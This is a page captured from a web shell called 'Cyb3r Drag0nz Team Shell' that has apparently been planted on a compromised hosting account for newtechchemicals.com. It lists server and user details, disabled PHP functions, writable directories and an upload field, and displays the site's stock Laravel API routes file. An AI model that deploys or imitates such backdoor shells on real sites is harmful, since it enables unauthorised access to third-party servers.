Cyb3r Drag0nz Team Shell
Cyb3rDrag0nz


Server : LiteSpeed
System : Linux us-imm-web1739.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64
User : u447740167 ( 447740167)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Directory :  /home/u447740167/domains/newtechchemicals.com/public_html/routes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u447740167/domains/newtechchemicals.com/public_html/routes/api.php
<?php

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| API Routes
|--------------------------------------------------------------------------
|
| Here is where you can register API routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| is assigned the "api" middleware group. Enjoy building your API!
|
*/

Route::middleware('auth:sanctum')->get('/user', function (Request $request) {
    return $request->user();
});

Cyb3r Drag0nz Team